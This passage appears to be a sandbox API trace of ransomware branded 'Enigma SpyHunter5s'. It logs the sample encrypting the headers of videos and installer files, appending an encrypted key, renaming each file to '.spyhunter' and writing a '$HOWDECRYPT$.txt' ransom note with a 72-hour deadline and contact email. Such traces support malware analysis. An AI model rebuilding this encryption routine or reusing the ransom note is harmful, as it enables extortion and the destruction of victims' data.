lpNewFilePointer=0x0) returned 1 [0147.127] WriteFile (in: hFile=0xa0, lpBuffer=0x248f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x248f0a4*, lpNumberOfBytesWritten=0x248f064*=0x4, lpOverlapped=0x0) returned 1 [0147.127] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f064*=0x30, lpOverlapped=0x0) returned 1 [0147.127] CloseHandle (hObject=0xa0) returned 1 [0147.127] GetProcessHeap () returned 0x2c0000 [0147.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.128] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.spyhunter") returned 90 [0147.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.spyhunter")) returned 1 [0147.128] GetProcessHeap () returned 0x2c0000 [0147.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.128] GetProcessHeap () returned 0x2c0000 [0147.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.128] GetProcessHeap () returned 0x2c0000 [0147.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64b78 | out: hHeap=0x2c0000) returned 1 [0147.129] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0a0 | out: pbBuffer=0x248f0a0) returned 1 [0147.129] GetProcessHeap () returned 0x2c0000 [0147.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.129] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f098*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f098*=0x30) returned 1 [0147.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.129] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 70 [0147.129] StrStrW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".txt") returned 0x0 [0147.130] GetProcessHeap () returned 0x2c0000 [0147.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.130] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f05c*=0x2800, lpOverlapped=0x0) returned 1 [0147.296] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.296] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f05c*=0x2800, lpOverlapped=0x0) returned 1 [0147.296] GetProcessHeap () returned 0x2c0000 [0147.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.296] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.296] WriteFile (in: hFile=0xa0, lpBuffer=0x248f09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f05c, lpOverlapped=0x0 | out: lpBuffer=0x248f09c*, lpNumberOfBytesWritten=0x248f05c*=0x4, lpOverlapped=0x0) returned 1 [0147.297] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f05c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f05c*=0x30, lpOverlapped=0x0) returned 1 [0147.297] CloseHandle (hObject=0xa0) returned 1 [0147.297] GetProcessHeap () returned 0x2c0000 [0147.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.297] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.spyhunter") returned 80 [0147.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.spyhunter" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.spyhunter")) returned 1 [0147.298] GetProcessHeap () returned 0x2c0000 [0147.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.298] GetProcessHeap () returned 0x2c0000 [0147.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.298] GetProcessHeap () returned 0x2c0000 [0147.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee9e0 | out: hHeap=0x2c0000) returned 1 [0147.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.299] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.299] WriteFile (in: hFile=0xa0, lpBuffer=0x248efd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f0fc, lpOverlapped=0x0 | out: lpBuffer=0x248efd3*, lpNumberOfBytesWritten=0x248f0fc*=0x127, lpOverlapped=0x0) returned 1 [0147.300] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.300] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f0fc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f0fc*=0x2ac, lpOverlapped=0x0) returned 1 [0147.300] CloseHandle (hObject=0xa0) returned 1 [0147.300] GetProcessHeap () returned 0x2c0000 [0147.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6938 | out: hHeap=0x2c0000) returned 1 [0147.300] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f098 | out: pbBuffer=0x248f098) returned 1 [0147.301] GetProcessHeap () returned 0x2c0000 [0147.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.301] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f090*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f090*=0x30) returned 1 [0147.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\vqcsUi0dXjs0_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\vqcsui0dxjs0_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\vqcsUi0dXjs0_.mp4") returned 68 [0147.301] StrStrW (lpFirst="vqcsUi0dXjs0_.mp4", lpSrch=".txt") returned 0x0 [0147.301] GetProcessHeap () returned 0x2c0000 [0147.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.301] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f054*=0x2800, lpOverlapped=0x0) returned 1 [0147.302] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.302] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f054*=0x2800, lpOverlapped=0x0) returned 1 [0147.302] GetProcessHeap () returned 0x2c0000 [0147.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.302] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.302] WriteFile (in: hFile=0xa0, lpBuffer=0x248f094*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x248f094*, lpNumberOfBytesWritten=0x248f054*=0x4, lpOverlapped=0x0) returned 1 [0147.302] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f054*=0x30, lpOverlapped=0x0) returned 1 [0147.302] CloseHandle (hObject=0xa0) returned 1 [0147.303] GetProcessHeap () returned 0x2c0000 [0147.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.303] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\vqcsUi0dXjs0_.mp4.spyhunter") returned 78 [0147.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\vqcsUi0dXjs0_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\vqcsui0dxjs0_.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\vqcsUi0dXjs0_.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\vqcsui0dxjs0_.mp4.spyhunter")) returned 1 [0147.303] GetProcessHeap () returned 0x2c0000 [0147.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.303] GetProcessHeap () returned 0x2c0000 [0147.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.304] GetProcessHeap () returned 0x2c0000 [0147.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee758 | out: hHeap=0x2c0000) returned 1 [0147.304] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f098 | out: pbBuffer=0x248f098) returned 1 [0147.304] GetProcessHeap () returned 0x2c0000 [0147.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.304] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f090*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f090*=0x30) returned 1 [0147.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\n5eiVtnS_H.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\n5eivtns_h.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\n5eiVtnS_H.mp4") returned 65 [0147.304] StrStrW (lpFirst="n5eiVtnS_H.mp4", lpSrch=".txt") returned 0x0 [0147.304] GetProcessHeap () returned 0x2c0000 [0147.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.304] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f054*=0x2800, lpOverlapped=0x0) returned 1 [0147.307] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.308] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f054*=0x2800, lpOverlapped=0x0) returned 1 [0147.308] GetProcessHeap () returned 0x2c0000 [0147.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.308] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.308] WriteFile (in: hFile=0xa0, lpBuffer=0x248f094*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x248f094*, lpNumberOfBytesWritten=0x248f054*=0x4, lpOverlapped=0x0) returned 1 [0147.308] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f054, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f054*=0x30, lpOverlapped=0x0) returned 1 [0147.308] CloseHandle (hObject=0xa0) returned 1 [0147.308] GetProcessHeap () returned 0x2c0000 [0147.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.308] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\n5eiVtnS_H.mp4.spyhunter") returned 75 [0147.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\n5eiVtnS_H.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\n5eivtns_h.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\n5eiVtnS_H.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\n5eivtns_h.mp4.spyhunter")) returned 1 [0147.309] GetProcessHeap () returned 0x2c0000 [0147.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.309] GetProcessHeap () returned 0x2c0000 [0147.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.309] GetProcessHeap () returned 0x2c0000 [0147.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6868 | out: hHeap=0x2c0000) returned 1 [0147.309] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f090 | out: pbBuffer=0x248f090) returned 1 [0147.309] GetProcessHeap () returned 0x2c0000 [0147.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f088*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f088*=0x30) returned 1 [0147.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\I7bIJJ orIfZij1v8.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\i7bijj orifzij1v8.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.310] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\I7bIJJ orIfZij1v8.swf") returned 72 [0147.310] StrStrW (lpFirst="I7bIJJ orIfZij1v8.swf", lpSrch=".txt") returned 0x0 [0147.310] GetProcessHeap () returned 0x2c0000 [0147.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.310] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f04c*=0x2800, lpOverlapped=0x0) returned 1 [0147.311] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.311] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f04c*=0x2800, lpOverlapped=0x0) returned 1 [0147.311] GetProcessHeap () returned 0x2c0000 [0147.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.311] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.311] WriteFile (in: hFile=0xa0, lpBuffer=0x248f08c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x248f08c*, lpNumberOfBytesWritten=0x248f04c*=0x4, lpOverlapped=0x0) returned 1 [0147.311] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f04c*=0x30, lpOverlapped=0x0) returned 1 [0147.312] CloseHandle (hObject=0xa0) returned 1 [0147.312] GetProcessHeap () returned 0x2c0000 [0147.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.312] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\I7bIJJ orIfZij1v8.swf.spyhunter") returned 82 [0147.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\I7bIJJ orIfZij1v8.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\i7bijj orifzij1v8.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\I7bIJJ orIfZij1v8.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\i7bijj orifzij1v8.swf.spyhunter")) returned 1 [0147.313] GetProcessHeap () returned 0x2c0000 [0147.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.313] GetProcessHeap () returned 0x2c0000 [0147.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.313] GetProcessHeap () returned 0x2c0000 [0147.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5038 | out: hHeap=0x2c0000) returned 1 [0147.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f090 | out: pbBuffer=0x248f090) returned 1 [0147.313] GetProcessHeap () returned 0x2c0000 [0147.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f088*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f088*=0x30) returned 1 [0147.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\aMMbqL3W3Rsj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\ammbql3w3rsj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\aMMbqL3W3Rsj.avi") returned 67 [0147.314] StrStrW (lpFirst="aMMbqL3W3Rsj.avi", lpSrch=".txt") returned 0x0 [0147.314] GetProcessHeap () returned 0x2c0000 [0147.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.314] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f04c*=0x2800, lpOverlapped=0x0) returned 1 [0147.315] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.315] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f04c*=0x2800, lpOverlapped=0x0) returned 1 [0147.315] GetProcessHeap () returned 0x2c0000 [0147.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.322] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.322] WriteFile (in: hFile=0xa0, lpBuffer=0x248f08c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x248f08c*, lpNumberOfBytesWritten=0x248f04c*=0x4, lpOverlapped=0x0) returned 1 [0147.322] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f04c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f04c*=0x30, lpOverlapped=0x0) returned 1 [0147.322] CloseHandle (hObject=0xa0) returned 1 [0147.322] GetProcessHeap () returned 0x2c0000 [0147.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.322] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\aMMbqL3W3Rsj.avi.spyhunter") returned 77 [0147.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\aMMbqL3W3Rsj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\ammbql3w3rsj.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZbKyIBvMi\\aMMbqL3W3Rsj.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zbkyibvmi\\ammbql3w3rsj.avi.spyhunter")) returned 1 [0147.323] GetProcessHeap () returned 0x2c0000 [0147.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.323] GetProcessHeap () returned 0x2c0000 [0147.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.323] GetProcessHeap () returned 0x2c0000 [0147.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6798 | out: hHeap=0x2c0000) returned 1 [0147.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, 